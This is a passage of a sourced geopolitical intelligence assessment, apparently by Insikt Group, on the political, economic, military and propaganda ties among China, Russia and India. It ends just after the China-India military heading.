        <p>India almost certainly <a href="https://rsis.edu.sg/rsis-publication/idss/ip25015-understanding-indias-evolving-policy-of-strategic-autonomy/">defines</a> its relationships with China and Russia through its <a href="https://www.mea.gov.in/press-releases.htm?dtl/40072">doctrine</a> of “strategic autonomy,” in which New Delhi avoids binding security alliances, instead maintaining flexibility in its relationships with global powers while cultivating influence across the developing world. Shaped by its role in <a href="https://theloop.ecpr.eu/indias-sovereignty-paradox-neutrality-oil-and-the-price-of-multi-alignment/">founding</a> the Non-Aligned Movement during the Cold War, New Delhi’s engagement with Beijing and Moscow has been a pragmatic <a href="https://government.economictimes.indiatimes.com/news/defence/between-empires-indias-diplomatic-balancing-act-with-the-usa-russia-and-china/121914598">balancing</a> <a href="https://www.chathamhouse.org/2025/07/back-back-brics-and-quad-meetings-highlight-indias-increasingly-difficult-balancing-act">act</a> seeking to <a href="https://eastasiaforum.org/2023/03/20/india-in-a-world-of-asymmetrical-multipolarity/">promote</a> an increasingly multipolar world order while simultaneously fostering ties with the US. India’s approach to China and Russia is also <a href="https://indiawrites.org/diplomacy/why-multi-alignment-matters-to-india-explains-jaishankar/">underpinned</a> by a “multi-alignment” policy, which very likely seeks to <a href="https://web.archive.org/web/20250910093650/https://www.thehindu.com/opinion/lead/indias-strategic-autonomy-in-a-multipolar-world/article70016666.ece">promote</a> and <a href="https://www.hudson.org/foreign-policy/indias-multi-alignment-rising-geopolitical-profile-aparna-pande">safeguard</a> India’s core national interests, including economic growth, national security, territorial integrity, regional stability, and global cooperation. Consistent with its strategic independence, New Delhi has <a href="https://www.isdp.eu/publication/india-in-a-world-of-asymmetrical-multipolarity/">cultivated</a> its role as a “neutral centrepiece” between China and the West while avoiding overt alignment with, or opposition to, any particular state.</p>
        <h3>Russia’s Foreign Policy</h3>
        <p>Moscow very likely views its relationships with China and India as beneficial to its core foreign policy goal of enhancing Russia’s global influence by replacing what Moscow sees as a US-centric global system with a multipolar world in which Russia is on equal footing with the US and China. This goal has almost certainly driven Moscow to place increased importance on relationships with non-Western powers, including China and India. Russia’s latest Foreign Policy Doctrine describes this goal as follows:</p>
        <p>Russia also sees value in expanding economic cooperation with China and India, as Moscow seeks to replace revenue lost due to Western sanctions. The sanctions that the EU and the US have placed on Russia for its annexation of Crimea in 2014 and full-scale invasion of Ukraine in 2022 have made Russia the most <a href="https://forbes.ge/en/the-most-sanctioned-countries/">sanctioned</a> state in the world.</p>
        <h3>China-Russia: Strategic Partners in Countering the West</h3>
        <p>In recent years, China and Russia have become critical strategic partners, with diplomatic, military, economic, and technological engagement deepening. Although tensions almost certainly exist, particularly in their respective intelligence services, close leader relations and convergence on strategic foreign policy objectives –– particularly pushing back against perceived Western hegemony –– means these low-level tensions are unlikely to undermine China and Russia’s overall cooperative trajectory.</p>
        <h4>Political Dynamics</h4>
        <p>Chinese and Russian leadership almost certainly see each other as primary strategic partners in <a href="https://www.reuters.com/world/xi-putin-hold-phone-call-ukraine-war-anniversary-state-media-says-2025-02-24/">advancing</a> the “multipolar” world. In 2023, Xi <a href="https://www.aljazeera.com/news/2023/3/22/xi-tells-putin-of-changes-not-seen-for-100">said</a> to Putin, “We are the ones driving” changes unseen in a century, and multiple <a href="https://www.airuniversity.af.edu/Portals/10/CASI/documents/Translations/2022-02-04%20China%20Russia%20joint%20statement%20International%20Relations%20Entering%20a%20New%20Era.pdf">joint</a> <a href="https://web.archive.org/web/20250829034246/http://en.kremlin.ru/supplement/6310">statements</a> have noted this goal. Moscow likely views China as having the ability to leverage its significant economic and political influence to amplify Russia’s goal of ushering in a multipolar world with Russia, the US, and China on equal footing. Russia is an advocate for, or a participant in, many of China’s global governance and development initiatives that relate to its goals for a “multipolar” world, including the <a href="https://web.archive.org/web/20250908074225/https://tass.com/politics/2010229">Global Governance Initiative</a>, <a href="https://web.archive.org/web/20230322013452/https://www.fmprc.gov.cn/eng/zxxx_662805/202303/t20230322_11046184.html">Global Security Initiative</a>, and <a href="https://web.archive.org/web/20230322013452/https://www.fmprc.gov.cn/eng/zxxx_662805/202303/t20230322_11046184.html">Global Development Initiative</a>.</p>
        <p>Putin and Xi very likely have a close political relationship, judging from their official statements and the frequency of their visits. Xi and Putin have <a href="https://www.nytimes.com/2024/05/15/world/asia/putin-xi-china-summit.html#:~:text=Putin%20when%20he%20made%20Russia,more%20than%20any%20other%20leader.">met</a> over 40 times since 2012 — more frequently than either has met with any other leader. In February 2022, China and Russia <a href="https://www.cfr.org/report/no-limits-china-russia-relationship-and-us-foreign-policy">declared</a> a “no limits partnership,” and in May 2025, Putin stated that “The comprehensive partnership and strategic cooperation between Russia and China are built on the unshakable principles of equality, mutual support and assistance, as well as the unbreakable friendship between the two states and two nations.” China and Russia’s political alignment has extended to supporting one another at international institutions. For example, they have used their veto powers on the UN Security Council (UNSC) to support one another’s interests, often vetoing resolutions that the other opposes.</p>
        <p>Although Putin and Xi have a close leader-level relationship and there is significant compatibility between Russia’s and China’s goals of increasing their respective global influence at the US’s expense, mistrust almost certainly exists at lower bureaucratic levels. Their voting alignment in the UN General Assembly and UNSC has <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">decreased</a> by roughly 10% since 2018. Though China has an officially neutral, though in practice somewhat pro-Russia, position on the war in Ukraine, the war very likely has had some negative effects on China, including potential trade <a href="https://www.kyivpost.com/post/60241">disruptions</a> and sanctions (<a href="https://www.eldwicklaw.com/uk-us-eu-sanctions-china/">1</a>, <a href="https://www.reuters.com/world/china/china-targets-two-eu-banks-retaliating-blocs-russia-sanctions-package-2025-08-13/">2</a>, <a href="https://edition.cnn.com/2024/10/18/china/us-sanctions-chinese-companies-attack-drones-russia-intl-hnk">3</a>). Nevertheless, China’s foreign minister reportedly made statements to European Union (EU) officials in July 2025 that conveyed that China, while not supporting Russia militarily, <a href="https://www.scmp.com/news/china/diplomacy/article/3316875/china-tells-eu-it-cannot-afford-russian-loss-ukraine-war-sources-say">prefers</a> a protracted conflict in Ukraine as it diverts the US’s focus away from China.</p>
        <p>At least some Russian intelligence officers very likely view China with suspicion, based on a leaked document <a href="https://www.nytimes.com/2025/06/07/world/europe/china-russia-spies-documents-putin-war.html">prepared</a> by the Federal Security Service’s (FSB) Department of Counterintelligence Operations (DKRO) describing China as a significant espionage threat to Russia. Insikt Group lacks context as to the origin and veracity of this memo and whether it reflects unusual levels of concern about Chinese espionage, or simply a recognition by the FSB that Chinese intelligence services –– which are highly capable and aggressive –– are likely to spy on all states, regardless of the level of political cooperation. Even if the memo reflects a concern by the FSB that Chinese espionage might go beyond typical intelligence operations, Putin’s significant control over the Russian bureaucratic apparatus means any misgivings about China among FSB officers are almost certain not to impact the overall China-Russia dynamic.</p>
        <h4>Economic Dynamics</h4>
        <p>Russia very likely views economic cooperation with China as a means to solidify its overall relationship with Beijing and make up for revenue lost from Western sanctions, as noted above. China likely views its economic relationship with Russia primarily as a means to achieve the political objectives described above, although China likely also benefits from technological partnership and the opportunity to expand trade <a href="https://carnegieendowment.org/russia-eurasia/politika/2024/05/china-russia-yuan?lang=en">denominated</a> in Chinese yuan.</p>
        <p>China has purchased increasingly more Russian oil and gas since Western sanctions went into effect following Russia’s annexation of Crimea in February 2014, diminishing Russia’s ability to sell oil and gas to Western markets. Since Russia invaded Ukraine in 2022, China’s import of Russian oil and natural gas has substantially <a href="https://asiasociety.org/policy-institute/china-russia-relations-start-war-ukraine">increased</a>. On September 2, 2025, Russia and China <a href="https://interfax.com/newsroom/top-stories/113563/">signed</a> a legally binding deal to build the long-delayed Power of Siberia 2 pipeline, which will supply 50 billion cubic meters of gas per year. As of 2023, Russia was China’s top crude oil supplier, and China <a href="https://www.bbc.com/news/60571253">buys</a> Russian crude oil at a price that is above the G7/EU price cap, further contributing to China’s role in providing Russia with sanctions relief. However, Chinese companies are likely wary of sanction penalties, as seen in reportedly <a href="https://oilprice.com/Latest-Energy-News/World-News/Chinese-Oil-Buyers-Reduce-Russian-Purchases.html">cancelled</a> orders of Russian oil imports following US <a href="https://home.treasury.gov/news/press-releases/sb0290">sanctions</a> in late October 2025.</p>
        <p>In addition to supporting Russia through increased purchase of Russian oil and gas, Beijing has long allowed –– if not encouraged –– the export of <a href="https://carnegieendowment.org/russia-eurasia/politika/2024/05/behind-the-scenes-chinas-increasing-role-in-russias-defense-industry?lang=en">dual-use</a> and <a href="https://www.politico.eu/article/china-firms-russia-body-armor-bullet-proof-drones-thermal-optics-army-equipment-shanghai-h-win/">military-relevant</a> <a href="https://www.rferl.org/a/russia-ukraine-china-sanctions-dual-use-yangjie-technology/33223415.html">goods</a> and <a href="https://www.reuters.com/business/aerospace-defense/chinese-drone-experts-worked-with-sanctioned-russian-arms-maker-sources-say-2025-09-25/">expertise</a>. As of mid-2025, dual-use exports to Russia likely have at least slightly <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">decreased</a> from their peak in 2024.</p>
        <p>Overall trade between China and Russia has also <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">grown</a> significantly since 2014, and particularly since Russia’s full-scale invasion of Ukraine in February 2022. In 2024, total trade reached $245 billion, nearly <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">double</a> that of 2020. The trade balance has been relatively even, with a slight Russian surplus. Russia’s exports to China have mainly consisted of fossil fuels and natural resources, while China’s exports to Russia are primarily manufactured goods such as automobiles, tractors, and electronics. Infrastructure projects –– such as new border <a href="https://web.archive.org/web/20250918185912/http://english.scio.gov.cn/m/internationalexchanges/2025-05/08/content_117863724.html">crossings</a> –– have helped support increased trade. Technology-oriented research partnerships between Chinese and Russian universities are also <a href="https://www.aspistrategist.org.au/aspis-china-defence-universities-tracker-rising-china-russia-links-defence-industry-ties-dual-use-tech-research/">expanding</a>, and China and Russia have <a href="https://web.archive.org/web/20240517015745/https://tass.com/politics/1789195">announced</a> deepening ties for research into information and communication technologies like artificial intelligence and the Internet of Things (IoT).</p>
        <p>There is also economic friction between China and Russia, though it is likely not significant enough to meaningfully derail deepening bilateral relations. Despite increasing Russian imports, China very likely seeks to <a href="https://asiasociety.org/policy-institute/china-russia-relations-start-war-ukraine">avoid</a> overdependence on Russia and has reportedly pressed Russia for cheaper rates. In fall 2024, Chinese financial institutions reportedly began <a href="https://www.reuters.com/business/finance/russia-payment-hurdles-with-china-partners-intensified-august-sources-say-2024-08-30/">halting</a> transactions with Russian customers, and at least one bank did so as recently as September 2025 after being <a href="https://finance.yahoo.com/news/key-chinese-bank-reportedly-halts-092655214.html">sanctioned</a> by the EU. In September 2024, China <a href="https://web.archive.org/web/20250529101130/https://www.gov.cn/zhengce/content/202410/content_6981399.htm">implemented</a> a mechanism to control dual-use goods exports, which may be contributing (alongside threats of US sanctions) to the aforementioned decrease in dual-use exports.</p>
        <h4>Military Dynamics</h4>
        <p>Military cooperation between China and Russia has deepened in recent years, likely with the goal of signaling to the West that they could pose a joint military threat –– a development that is very unlikely to materialize –– and likely sharing tactical and strategic intelligence that could help each state achieve its respective military goals. Since 2018, military exercises between China and Russia have become more <a href="https://www.cfr.org/article/where-china-russia-partnership-headed-seven-charts-and-maps">frequent</a> and more <a href="https://www.iss.europa.eu/publications/briefs/rehearsing-war-china-and-russias-military-exercises">complex</a>, and are expanding into new geographic areas. In 2018, China became the first country outside the former Soviet Union to <a href="https://web.archive.org/web/20250911010902/https://www.nato.int/docu/review/articles/2018/12/20/vostok-2018-ten-years-of-russian-strategic-exercises-and-warfare-preparation/index.html">participate</a> in Russia’s Vostok (East) military exercise, which involved large-scale land and sea operations centered around contingencies in the Pacific. The Vostok 2022 exercise <a href="https://www.scmp.com/news/china/diplomacy/article/3192074/signs-china-russia-military-trust-vostok-2022-war-games">involved</a> a more comprehensive Chinese contingent, as it represented the first time all three Chinese military components — land, sea, and air — participated in a Russian military exercise. In mid-2024, the Chinese and Russian militaries conducted a joint bomber <a href="https://www.norad.mil/Newsroom/Press-Releases/Article/3849184/norad-detects-tracks-and-intercepts-russian-and-prc-aircraft-operating-in-the-a/">flight</a> into the US’s air defense identification zone (ADIZ) around Alaska for the first time. In September 2025, China and Russia <a href="https://jamestown.org/program/first-joint-russian-prc-submarine-exercise-patrols-pacific/">conducted</a> their first joint submarine patrol (or other exercise) in the Sea of Japan and East China Sea. Insikt Group has not identified any instances of declared Russian and Chinese forces deploying together to an active combat zone.</p>
        <p>In October 2024, Russian Minister of Defense Andrey Belousov met with Chinese military officials in Beijing, after which he <a href="https://web.archive.org/web/20241031071355/https://www.rt.com/russia/605735-russia-china-military-cooperation/">stated</a> that Russia and China have “common views, a common assessment of the situation, and a common understanding of what [needs to be done]” to maintain global stability. China’s readout from one of these meetings further <a href="https://web.archive.org/web/20241108084758/https://www.gov.cn/lianbo/bumen/202410/content_6980333.htm">indicates</a> that bilateral military cooperation aims to defend China and Russia’s “common interests” and “maintain global strategic stability.”</p>
        <p>Beyond military exercises, US officials have <a href="https://www.politico.eu/article/united-states-accuse-china-help-russia-war-kurt-campbell/">asserted</a> as recently as September 2024 that Russia, in exchange for support from China for the war effort in Ukraine, is providing military technical support to China in new areas, including in relation to submarine operations, aeronautical design (including stealth), and missile capabilities. The Ukrainian government <a href="https://www.theguardian.com/world/2025/apr/18/ukraine-war-briefing-china-arming-russia-and-building-weapons-on-its-soil-says-zelenskyy">asserts</a> that China is supplying weapons to Russia, including gunpowder and artillery; that “Chinese representatives” are producing weapons in Russia; and that China is <a href="https://archive.ph/Ewzr6">providing</a> Russia with satellite intelligence that supports missile strikes in Ukraine. In January 2023, the US <a href="https://www.bbc.com/news/world-asia-china-64421915">sanctioned</a> a Chinese satellite imagery provider for enabling Russian combat operations. As of September 2025, “Chinese drone experts” were <a href="https://www.reuters.com/business/aerospace-defense/chinese-drone-experts-worked-with-sanctioned-russian-arms-maker-sources-say-2025-09-25/">working</a> on military drone development in Russia, according to Reuters. At least two Chinese commercial ships have been <a href="https://www.cbsnews.com/news/eagle-s-how-yi-peng-3-and-newnew-polar-bear-wreaked-havoc-in-baltic-sea-60-minutes/">involved</a> in Baltic Sea submarine cable-cutting incidents, though Beijing’s involvement in these incidents is unclear.</p>
        <p>Despite China and Russia’s deepening military relationship, there likely remain limits to the amount of military support Russia is willing to provide to China in the event China is involved in an active conflict such as an invasion of Taiwan. China and Russia have not established a formal alliance or mutual defense pact, so Russia’s level of support would depend on Putin’s calculus. Given the significant resources Russia has devoted to its conflict in Ukraine –– including casualties higher than all conflicts Russia has fought in since World War II combined –– and the fact that Russia does not have a direct stake in the outcome of a Chinese invasion of Taiwan, Russia likely would provide China with only enough support to prevent alienating Beijing. That could include logistical and intelligence support as well as provision of air defense systems such as the S-400.</p>
        <h4>Cooperation in Propaganda and Influence Operations</h4>
        <p>We assess China and Russia have deepened their cooperation on overt state propaganda and influence operations, likely because their shared strategic goal of curbing US influence translates into convergence on desired media narratives and disinformation campaigns. Since the early 2000s, China and Russia have increasingly institutionalized their media relationship, <a href="https://www.wilsoncenter.org/publication/china-russia-convergence-communication-sphere-exploring-growing-information-nexus">including</a> media forums, journalist exchanges activities, co-produced content, and mutually supportive media. In May 2025, China and Russia released a joint statement <a href="https://web.archive.org/web/20250509070130/https://www.gov.cn/yaowen/liebiao/202505/content_7023051.htm">stating</a> that they would “jointly articulate a common stance in the global media space.”</p>
        <p>China and Russia have very likely amplified each other’s influence narratives, though we do not have evidence to suggest technical coordination of influence campaigns. Leaked correspondence from the Russian State Television and Radio Company (VGTRK) <a href="https://theintercept.com/2022/12/30/russia-china-news-media-agreement/">shows</a> that, since at least 2021, Russia and China have had formal agreements to share content and coordinate content distribution at the ministerial level. In December 2022, a China-linked network of inauthentic activity, Empire Dragon (also known as Spamouflage) <a href="https://www.recordedfuture.com/ko/research/empire-dragon-accelerates-covert-information-operations-converges-russian-narratives">spread</a> narratives supporting Russia’s claims that the US is developing biological weapons in Ukraine. Empire Dragon has also likely <a href="https://www.philstar.com/headlines/2025/08/25/2466374/copypasta-army-vietnam-smeared-bots-backing-duterte-x">used</a> a Russia-based social media account reseller, and accounts associated with Empire Dragon have, at times, been used to share Russian inauthentic content. China and Russia have likely used the same inauthentic social media account services to disseminate their influence narratives.</p>
        <p>Since approximately 2019, China has <a href="https://demtech.oii.ox.ac.uk/wp-content/uploads/sites/12/2019/09/CyberTroop-Report19.pdf">increasingly</a> used computational propaganda and influence operation tactics likely <a href="https://www.washingtonpost.com/outlook/trump-wants-china-to-help-him-win-china-wants-nothing-to-do-with-him/2019/10/10/15fddd9a-eadf-11e9-9c6d-436a0df4f31d_story.html">learned</a> by observing Russia, but whether there is a more formal exchange of methods occurring is unknown. Chinese media outlets consistently <a href="https://journals.sagepub.com/doi/pdf/10.1177/17427665251328117?utm_source=chatgpt.com">frame</a> the Russia-Ukraine war as a US-Russia proxy war, criticize Western hegemony, cast Russia as a rational actor defending its own sovereignty, call Ukraine reckless, and describe the EU as internally fractured. In March 2022, when Meta <a href="https://www.theverge.com/2022/3/1/22956532/facebook-russian-state-media-global-recommendation-suspension">banned</a> Russian state media outlets from purchasing ads on its platforms, China Global TV Network <a href="https://www.axios.com/2022/03/09/chinas-state-media-meta-facebook-ads-russia?utm_source=chatgpt.com">placed</a> at least 21 pro-Russia advertisements on Facebook in a single month.</p>
        <h3>China-India: Nascent Thaw of Longtime Tension-Filled Relationship</h3>
        <p>China-India relations have <a href="https://strategicspace.nbr.org/cooperation-coexistence-and-contestation-in-indias-and-chinas-overlapping-strategic-spaces/">gone</a> through cycles of cooperation and competition for decades, and have been marked by border tensions since 1962, when China and India fought a war over their contested border. Beijing likely primarily views India through the prism of its broader security environment, and Beijing’s suspicion of India is likely rooted, at least in part, in China’s rivalry with the US and the US’s perceived efforts to encircle China. China’s close relationship with Pakistan, India’s longstanding regional rival, likely also contributes to New Delhi’s wariness of Beijing.</p>
        <p>In recent months, China-India relations have likely <a href="https://web.archive.org/web/20250906232150/https://thediplomat.com/2025/09/china-india-transactional-thaw-or-structured-detente/">returned</a> to a positive trajectory, driven primarily by high-level diplomatic overtures and deepening trade relations. US tariff policy towards India has likely <a href="https://www.nytimes.com/2025/08/18/world/asia/india-china-trump.html">driven</a> India to pursue <a href="https://timesofindia.indiatimes.com/blogs/toi-edit-page/first-tango-in-five-years/">improved</a> ties with China. Modi and Xi have framed their countries as “development partners and not rivals,” <a href="https://timesofindia.indiatimes.com/business/india-business/donald-trumps-tariffs-on-india-pm-modi-and-donald-trump-sco-meet-india-and-china-vladimir-putin/articleshow/123547432.cms">challenging</a> years of US efforts to bolster India’s role as a counterweight to China’s growing economic and political influence. Modi’s statement following his meeting with Xi on August 31, 2025, <a href="https://www.indiatoday.in/india/story/read-full-statement-on-pm-modi-bilateral-meeting-with-president-xi-at-tianjin-sco-summit-2779553-2025-08-31">noted</a> that “a stable relationship and cooperation” was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century” — alluding to India’s view that it constitutes a major power center in Asia alongside China. Despite this nascent <a href="https://indianexpress.com/article/india/modis-china-visit-in-2-readouts-a-message-and-a-signal-strategic-autonomy-fair-trade-10222915/">rapprochement</a>, significant hurdles and unresolved disagreements <a href="https://web.archive.org/web/20250725103521/https://thediplomat.com/2025/07/the-limits-of-pragmatic-intentions-the-evolving-story-of-china-india-rapprochement/">remain</a>, making it less likely that China and India will form a long-term strategic partnership.</p>
        <h4>Political Dynamics</h4>
        <p>China’s approach to India is likely primarily <a href="https://carnegieendowment.org/research/2022/12/a-historical-evaluation-of-chinas-india-policy-lessons-for-india-china-relations?lang=en">driven</a> by the perceived threats posed by India’s relationship with other powers and perceived anti-China coalitions, rather than cooperation and competition with India on its own terms. Beijing’s perception that a stronger India-US relationship poses a threat to China’s interests is likely a principal factor today. China has sought to <a href="https://chinapower.csis.org/analysis/china-upgrading-dual-use-xiaokang-villages-india-border/">consolidate</a> control over disputed border territories, <a href="https://www.usip.org/publications/2023/05/why-we-should-all-worry-about-china-india-border-dispute">leading</a> to deadly skirmishes with India and <a href="https://www.recordedfuture.com/ko/research/redecho-targeting-indian-power-sector">cyberattacks</a> <a href="https://www.recordedfuture.com/ko/research/continued-targeting-of-indian-power-grid-assets">against</a> Indian critical infrastructure. India’s approach to China has likely been <a href="https://www.cfr.org/backgrounder/china-india-relationship-between-cooperation-and-competition">rooted</a> in efforts to curb China’s economic ambitions and regional assertiveness, as well as its longstanding border dispute with China.</p>
        <p>Over the last year, China and India’s relations have <a href="https://www.reuters.com/world/china/ties-thaw-between-asian-rivals-india-china-2025-08-29/">thawed</a> significantly, especially compared to 2020, when the China-India border dispute <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">escalated</a>. In 2024, China and India <a href="https://www.cnn.com/2024/10/22/asia/india-china-border-agreement-intl-hnk">concluded</a> an agreement that <a href="https://www.reuters.com/world/asia-pacific/india-china-start-pulling-back-troops-border-face-off-points-source-says-2024-10-25/">returned</a> the border to its pre-2020 status, thereby completing a disengagement process and <a href="https://www.indiatoday.in/india/story/india-china-reopen-three-himalayan-trade-passes-after-five-years-2775110-2025-08-22">reopening</a> border trade. India and China began <a href="https://frontline.thehindu.com/world-affairs/india-china-relations-border-economic-trade/article69996270.ece">re-engaging</a> in diplomatic dialogue at the highest level, including a meeting between Modi and Xi on the sidelines of the BRICS summit in Kazan, Russia, in October 2024. In September 2025, Modi visited China for the first time in seven years to attend the 2025 SCO Summit, during which China and India <a href="https://www.lowyinstitute.org/the-interpreter/what-resuming-direct-india-china-flights-reveals-about-changing-regional-priorities">resumed</a> direct commercial flights after a five-year freeze. Chinese Foreign Minister Wang Yi and Indian External Affairs Minister Subrahmanyam Jaishankar <a href="https://web.archive.org/web/20250822085634/https://www.fmprc.gov.cn/eng/wjbzhd/202508/t20250819_11692398.html">emphasized</a> the importance of continued cooperation between the two countries.</p>
        <p>Despite China and India’s recent diplomatic and economic overtures, tensions remain, particularly around India’s likely suspicions of China’s regional assertiveness and its likely hesitancy to join a persistent anti-Western bloc. Both countries have <a href="https://web.archive.org/web/20250822085634/https://www.fmprc.gov.cn/eng/wjbzhd/202508/t20250819_11692398.html">endorsed</a> the idea of a multipolar world, but Modi has <a href="https://trackingpeoplesdaily.substack.com/p/analysis-of-the-modi-xi-meeting-in?utm_source=publication-search">emphasized</a> the need for a multipolar Asia, likely highlighting continuing tensions that stem from China’s economic influence, military power, and international assertiveness. India likely <a href="https://www.chathamhouse.org/2025/07/back-back-brics-and-quad-meetings-highlight-indias-increasingly-difficult-balancing-act">seeks</a> to <a href="https://moderndiplomacy.eu/2025/09/13/india-and-china-as-beacons-of-multipolarity/">balance</a> asserting itself as a regional power while maintaining good relations with the US. As such, India has not mirrored Russia and China’s strong advocacy for de-dollarization and replacing the international financial system with one based on China’s currency; it has only <a href="https://timesofindia.indiatimes.com/business/india-business/de-dollarisation-not-on-agenda-india-rebuffs-brics-currency-conspiracy-claims-exploring-cross-border-rupee-use/articleshow/122663479.cms">supported</a> inter-BRICS trade based on local currency.</p>
        <h4>Economic Dynamics</h4>
        <p>We assess that China-India economic relations are generally positive, though India took steps to limit Chinese investment during the COVID-19 pandemic and during the 2020 border clashes. In April 2020, India <a href="https://web.archive.org/web/20211231125626/https://dpiit.gov.in/sites/default/files/pn3_2020.pdf">issued</a> Press Note 3, which <a href="https://carnegieendowment.org/research/2025/08/india-china-economic-ties-determinants-and-possibilities?lang=en">limited</a> Chinese investment and existing investments; new Chinese foreign direct investment cumulatively fell by approximately 80% in the 2021–2024 period compared to prior to 2021, and the number of active Chinese companies in India declined by nearly 500. For example, India reportedly <a href="https://archive.ph/uRVbz">rejected</a> a proposed $1 billion investment by China’s electric car maker BYD in 2023 over national security concerns, and a visa ban on Chinese tourists reportedly constrained BYD’s lobbying efforts.</p>
        <p>Despite Indian actions to limit Chinese investment, India’s economy likely remains heavily <a href="https://www.indiatoday.in/business/story/make-in-india-made-in-china-manufacturing-economics-trade-deficit-report-pm-modi-geopolitical-2769387-2025-08-11">dependent</a> on Chinese supply chains, which very likely <a href="https://www.usip.org/publications/2025/06/how-vulnerable-india-chinese-economic-coercion">gives</a> Beijing some economic leverage over India.</p>
        <p>India faces a significant and growing trade deficit with China — <a href="https://eoibeijing.gov.in/eoibejing_pages/MjQ,">reaching</a> $99.21 billion between 2024 and 2025 — and this imbalance has more than doubled in four years. China <a href="https://www.usip.org/publications/2025/06/how-vulnerable-india-chinese-economic-coercion">remains</a> India’s top import source for many goods and commodities critical to its own industrial output, including electronics, telecommunications, electrical products, and machinery.</p>
        <p>India has taken actions to <a href="https://timesofindia.indiatimes.com/business/india-business/how-india-is-planning-to-lower-reliance-on-china-for-its-supply-chains-new-plan-in-works/articleshow/104669779.cms">reduce</a> its dependence on Chinese investment and develop its own competitive advantage. Modi’s administration has <a href="https://www.pib.gov.in/PressReleasePage.aspx?PRID=2107825">bolstered</a> <a href="https://ibef.org/economy/make-in-india">investment</a> in domestic production and <a href="https://www.cato.org/policy-analysis/indias-new-protectionism-threatens-gains-economic-reform#introduction">implemented</a> protectionist policies, such as the “<a href="https://www.pmindia.gov.in/en/major_initiatives/make-in-india/">Make in India</a>” policy, the <a href="https://www.pib.gov.in/PressNoteDetails.aspx?id=155082&amp;NoteId=155082&amp;ModuleId=3">Production-Linked Incentive</a> (PLI) scheme, and, most recently, the “<a href="https://www.impriindia.com/insights/manufacturing-mission-2025/">National Manufacturing Mission</a>.” Threatening China’s economic and technological interests, India <a href="https://economictimes.indiatimes.com/tech/technology/non-chinese-lending-apps-including-payus-lazypay-kissht-blocked-on-meitys-order/articleshow/97656552.cms?from=mdr">banned</a> hundreds of Chinese-developed mobile applications and has <a href="https://www.hindustantimes.com/world-news/trust-replaces-icet-new-brand-old-spirit-on-tech-partnership-101739524899203.html">pursued</a> <a href="https://carnegieendowment.org/posts/2024/09/india-us-relations-beyond-the-modi-biden-dynamic?lang=en">efforts</a> with the US to develop advanced technology supply chains. China has pushed back against some of these efforts. For example, China may have sought to <a href="https://restofworld.org/2025/china-foxconn-factoriesfoxconn-stops-sending-chinese-workers-to-india-iphone-factories/">impede</a> Apple from <a href="https://www.aljazeera.com/economy/2025/4/25/apple-to-move-assembly-of-us-phones-to-india-in-shift-away-from-china">moving</a> its supply chain for US phones from China to India.</p>
        <p>Another area of tension in the China-India economic relationship is very likely China’s increasing investment in South Asia, which conflicts with India’s “Neighbourhood First” policy, in which India <a href="https://www.orfonline.org/research/a-decade-of-neighbourhood-first-perspectives-from-south-asia">views</a> the region as its primary sphere of influence. The policy, <a href="https://www.tandfonline.com/doi/full/10.1080/09700161.2025.2545143?src=">considered</a> a “defining subset of its overall foreign policy,” <a href="https://www.mea.gov.in/lok-sabha.htm?dtl/38762/QUESTION+NO+262+INDIAS+NEIGHBOURHOOD+FIRST+POLICY">hinges</a> on India fostering connectivity, trade, and stability across the region. India likely perceives China’s engagement in South Asia as an effort to exert dominance in a region vital to India’s strategic interests. India almost certainly <a href="https://economictimes.indiatimes.com/news/india/india-reiterates-opposition-to-chinas-belt-and-road-initiative-at-sco-conclave/articleshow/114282891.cms?from=mdr">opposes</a> China’s Belt and Road Initiative (BRI) because New Delhi <a href="https://www.cfr.org/backgrounder/chinas-massive-belt-and-road-initiative">views</a> China’s strategy –– an expansive development and investment project originally devised to construct infrastructure linking East Asia and Europe –– as seeking to dominate the region and <a href="https://www.researchgate.net/publication/380693831_China's_Belt_and_Road_Initiative_A_Threat_to_Indian_Economy_and_Sovereignty">counter</a> India’s regional influence, posing a direct threat to Indian sovereignty. A specific point of contention is the China-Pakistan Economic Corridor (CPEC) — a 3,000-kilometer, over $60 billion project <a href="https://finsindia.org/the-rise-of-china-as-a-threat-to-indias-national-security.html">linking</a> China and Pakistan through roads, railways, and pipelines — which India almost certainly <a href="https://web.archive.org/web/20250616104947/https://www.business-standard.com/external-affairs-defence-security/news/cpec-against-our-territorial-integrity-sovereignty-mea-on-pojk-124053001668_1.html">perceived</a> as the most immediate <a href="https://www.orfonline.org/research/indias-latest-concerns-with-the-cpec?">threat</a> to Indian sovereignty, as it runs through disputed territory in Pakistan-occupied Kashmir. The CPEC aims to <a href="https://www.financialexpress.com/world-news/china-exits-pakistans-60-billion-cpec-flagship-project-islamabad-turns-to-adb-for-funding/3968043/">facilitate</a> Chinese energy imports while <a href="https://merics.org/en/analysis/bri-pakistan-chinas-flagship-economic-corridor">strengthening</a> Pakistan’s economy and strategic connectivity, and Beijing’s backing of Islamabad with resources and infrastructure is likely a major <a href="https://www.ndtv.com/india-news/high-degree-of-collusivity-indian-army-chief-general-upendra-dwivedi-on-pakistan-china-7879130?">concern</a> for India.</p>
        <p>Despite tensions, the value of China’s annual exports to India was greater between 2020 and 2024 than between 2016 and 2020, and was approximately $20 billion <a href="https://www.china-briefing.com/news/china-india-economic-ties-trade-investment-and-opportunities/">more</a> in 2021 than in 2018. The total value of foreign direct investment from China into India also <a href="https://carnegieendowment.org/research/2025/08/india-china-economic-ties-determinants-and-possibilities?lang=en">returned</a> to an upward trajectory after 2021, and particularly in 2024. Multilateral fora such as BRICS and the Asian Infrastructure Investment Bank (AIIB) likely provide additional mechanisms for economic cooperation. China <a href="https://www.reuters.com/article/business/china-launches-new-aiib-development-bank-as-power-balance-shifts-idUSKCN0UU040/">launched</a> the AIIB in 2016, and the bank has dozens of <a href="https://www.aiib.org/en/projects/list/index.html">approved</a> projects in India.</p>
        <h4>Military Dynamics</h4>
        <p>We assess that, since 2020, the China-India military dynamic has centered primarily around a longstanding border dispute and each state’s suspicions of the other’s regional ambitions.</p>
